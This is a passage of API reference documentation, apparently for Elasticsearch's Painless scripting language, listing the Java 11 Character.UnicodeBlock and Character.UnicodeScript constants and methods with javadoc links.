{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CONTROL_PICTURES[CONTROL_PICTURES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COPTIC[COPTIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COUNTING_ROD_NUMERALS[COUNTING_ROD_NUMERALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CUNEIFORM[CUNEIFORM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CUNEIFORM_NUMBERS_AND_PUNCTUATION[CUNEIFORM_NUMBERS_AND_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CURRENCY_SYMBOLS[CURRENCY_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYPRIOT_SYLLABARY[CYPRIOT_SYLLABARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC[CYRILLIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_EXTENDED_A[CYRILLIC_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_EXTENDED_B[CYRILLIC_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_SUPPLEMENTARY[CYRILLIC_SUPPLEMENTARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DESERET[DESERET] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DEVANAGARI[DEVANAGARI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DEVANAGARI_EXTENDED[DEVANAGARI_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DINGBATS[DINGBATS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DOMINO_TILES[DOMINO_TILES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#EGYPTIAN_HIEROGLYPHS[EGYPTIAN_HIEROGLYPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#EMOTICONS[EMOTICONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_ALPHANUMERICS[ENCLOSED_ALPHANUMERICS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_ALPHANUMERIC_SUPPLEMENT[ENCLOSED_ALPHANUMERIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_CJK_LETTERS_AND_MONTHS[ENCLOSED_CJK_LETTERS_AND_MONTHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_IDEOGRAPHIC_SUPPLEMENT[ENCLOSED_IDEOGRAPHIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC[ETHIOPIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_EXTENDED[ETHIOPIC_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_EXTENDED_A[ETHIOPIC_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_SUPPLEMENT[ETHIOPIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GENERAL_PUNCTUATION[GENERAL_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEOMETRIC_SHAPES[GEOMETRIC_SHAPES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEORGIAN[GEORGIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEORGIAN_SUPPLEMENT[GEORGIAN_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GLAGOLITIC[GLAGOLITIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GOTHIC[GOTHIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GREEK[GREEK] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GREEK_EXTENDED[GREEK_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GUJARATI[GUJARATI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GURMUKHI[GURMUKHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HALFWIDTH_AND_FULLWIDTH_FORMS[HALFWIDTH_AND_FULLWIDTH_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_COMPATIBILITY_JAMO[HANGUL_COMPATIBILITY_JAMO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO[HANGUL_JAMO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO_EXTENDED_A[HANGUL_JAMO_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO_EXTENDED_B[HANGUL_JAMO_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_SYLLABLES[HANGUL_SYLLABLES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANUNOO[HANUNOO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HEBREW[HEBREW] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIGH_PRIVATE_USE_SURROGATES[HIGH_PRIVATE_USE_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIGH_SURROGATES[HIGH_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIRAGANA[HIRAGANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IDEOGRAPHIC_DESCRIPTION_CHARACTERS[IDEOGRAPHIC_DESCRIPTION_CHARACTERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IMPERIAL_ARAMAIC[IMPERIAL_ARAMAIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#INSCRIPTIONAL_PAHLAVI[INSCRIPTIONAL_PAHLAVI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#INSCRIPTIONAL_PARTHIAN[INSCRIPTIONAL_PARTHIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IPA_EXTENSIONS[IPA_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#JAVANESE[JAVANESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KAITHI[KAITHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANA_SUPPLEMENT[KANA_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANBUN[KANBUN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANGXI_RADICALS[KANGXI_RADICALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANNADA[KANNADA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KATAKANA[KATAKANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KATAKANA_PHONETIC_EXTENSIONS[KATAKANA_PHONETIC_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KAYAH_LI[KAYAH_LI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHAROSHTHI[KHAROSHTHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHMER[KHMER] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHMER_SYMBOLS[KHMER_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LAO[LAO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_1_SUPPLEMENT[LATIN_1_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_A[LATIN_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_ADDITIONAL[LATIN_EXTENDED_ADDITIONAL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_B[LATIN_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_C[LATIN_EXTENDED_C] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_D[LATIN_EXTENDED_D] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LEPCHA[LEPCHA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LETTERLIKE_SYMBOLS[LETTERLIKE_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LIMBU[LIMBU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LINEAR_B_IDEOGRAMS[LINEAR_B_IDEOGRAMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LINEAR_B_SYLLABARY[LINEAR_B_SYLLABARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LISU[LISU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LOW_SURROGATES[LOW_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LYCIAN[LYCIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LYDIAN[LYDIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MAHJONG_TILES[MAHJONG_TILES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MALAYALAM[MALAYALAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MANDAIC[MANDAIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MATHEMATICAL_ALPHANUMERIC_SYMBOLS[MATHEMATICAL_ALPHANUMERIC_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MATHEMATICAL_OPERATORS[MATHEMATICAL_OPERATORS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEETEI_MAYEK[MEETEI_MAYEK] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEETEI_MAYEK_EXTENSIONS[MEETEI_MAYEK_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEROITIC_CURSIVE[MEROITIC_CURSIVE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEROITIC_HIEROGLYPHS[MEROITIC_HIEROGLYPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MIAO[MIAO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_MATHEMATICAL_SYMBOLS_A[MISCELLANEOUS_MATHEMATICAL_SYMBOLS_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_MATHEMATICAL_SYMBOLS_B[MISCELLANEOUS_MATHEMATICAL_SYMBOLS_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS[MISCELLANEOUS_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS_AND_ARROWS[MISCELLANEOUS_SYMBOLS_AND_ARROWS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS_AND_PICTOGRAPHS[MISCELLANEOUS_SYMBOLS_AND_PICTOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_TECHNICAL[MISCELLANEOUS_TECHNICAL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MODIFIER_TONE_LETTERS[MODIFIER_TONE_LETTERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MONGOLIAN[MONGOLIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MUSICAL_SYMBOLS[MUSICAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MYANMAR[MYANMAR] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MYANMAR_EXTENDED_A[MYANMAR_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NEW_TAI_LUE[NEW_TAI_LUE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NKO[NKO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NUMBER_FORMS[NUMBER_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OGHAM[OGHAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_ITALIC[OLD_ITALIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_PERSIAN[OLD_PERSIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_SOUTH_ARABIAN[OLD_SOUTH_ARABIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_TURKIC[OLD_TURKIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OL_CHIKI[OL_CHIKI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OPTICAL_CHARACTER_RECOGNITION[OPTICAL_CHARACTER_RECOGNITION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ORIYA[ORIYA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OSMANYA[OSMANYA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHAGS_PA[PHAGS_PA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHAISTOS_DISC[PHAISTOS_DISC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHOENICIAN[PHOENICIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHONETIC_EXTENSIONS[PHONETIC_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHONETIC_EXTENSIONS_SUPPLEMENT[PHONETIC_EXTENSIONS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PLAYING_CARDS[PLAYING_CARDS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PRIVATE_USE_AREA[PRIVATE_USE_AREA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#REJANG[REJANG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#RUMI_NUMERAL_SYMBOLS[RUMI_NUMERAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#RUNIC[RUNIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SAMARITAN[SAMARITAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SAURASHTRA[SAURASHTRA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SHARADA[SHARADA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SHAVIAN[SHAVIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SINHALA[SINHALA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SMALL_FORM_VARIANTS[SMALL_FORM_VARIANTS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SORA_SOMPENG[SORA_SOMPENG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SPACING_MODIFIER_LETTERS[SPACING_MODIFIER_LETTERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SPECIALS[SPECIALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUNDANESE[SUNDANESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUNDANESE_SUPPLEMENT[SUNDANESE_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPERSCRIPTS_AND_SUBSCRIPTS[SUPERSCRIPTS_AND_SUBSCRIPTS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_ARROWS_A[SUPPLEMENTAL_ARROWS_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_ARROWS_B[SUPPLEMENTAL_ARROWS_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_MATHEMATICAL_OPERATORS[SUPPLEMENTAL_MATHEMATICAL_OPERATORS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_PUNCTUATION[SUPPLEMENTAL_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTARY_PRIVATE_USE_AREA_A[SUPPLEMENTARY_PRIVATE_USE_AREA_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTARY_PRIVATE_USE_AREA_B[SUPPLEMENTARY_PRIVATE_USE_AREA_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SYLOTI_NAGRI[SYLOTI_NAGRI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SYRIAC[SYRIAC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGALOG[TAGALOG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGBANWA[TAGBANWA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGS[TAGS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_LE[TAI_LE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_THAM[TAI_THAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_VIET[TAI_VIET] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_XUAN_JING_SYMBOLS[TAI_XUAN_JING_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAKRI[TAKRI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAMIL[TAMIL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TELUGU[TELUGU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#THAANA[THAANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#THAI[THAI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TIBETAN[TIBETAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TIFINAGH[TIFINAGH] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TRANSPORT_AND_MAP_SYMBOLS[TRANSPORT_AND_MAP_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UGARITIC[UGARITIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS[UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS_EXTENDED[UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VAI[VAI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VARIATION_SELECTORS[VARIATION_SELECTORS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VARIATION_SELECTORS_SUPPLEMENT[VARIATION_SELECTORS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VEDIC_EXTENSIONS[VEDIC_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VERTICAL_FORMS[VERTICAL_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YIJING_HEXAGRAM_SYMBOLS[YIJING_HEXAGRAM_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YI_RADICALS[YI_RADICALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YI_SYLLABLES[YI_SYLLABLES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#forName(java.lang.String)[forName](null) -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#of(int)[of](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Character-UnicodeScript]] -==== Character.UnicodeScript -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ARABIC[ARABIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ARMENIAN[ARMENIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#AVESTAN[AVESTAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BALINESE[BALINESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BAMUM[BAMUM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BATAK[BATAK] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BENGALI[BENGALI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BOPOMOFO[BOPOMOFO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BRAHMI[BRAHMI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BRAILLE[BRAILLE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BUGINESE[BUGINESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BUHID[BUHID] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CANADIAN_ABORIGINAL[CANADIAN_ABORIGINAL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CARIAN[CARIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHAKMA[CHAKMA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHAM[CHAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHEROKEE[CHEROKEE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#COMMON[COMMON] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#COPTIC[COPTIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CUNEIFORM[CUNEIFORM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CYPRIOT[CYPRIOT] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CYRILLIC[CYRILLIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#DESERET[DESERET] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#DEVANAGARI[DEVANAGARI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#EGYPTIAN_HIEROGLYPHS[EGYPTIAN_HIEROGLYPHS] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ETHIOPIC[ETHIOPIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GEORGIAN[GEORGIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GLAGOLITIC[GLAGOLITIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GOTHIC[GOTHIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GREEK[GREEK] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GUJARATI[GUJARATI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GURMUKHI[GURMUKHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HAN[HAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HANGUL[HANGUL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HANUNOO[HANUNOO] -* static Character.UnicodeScript 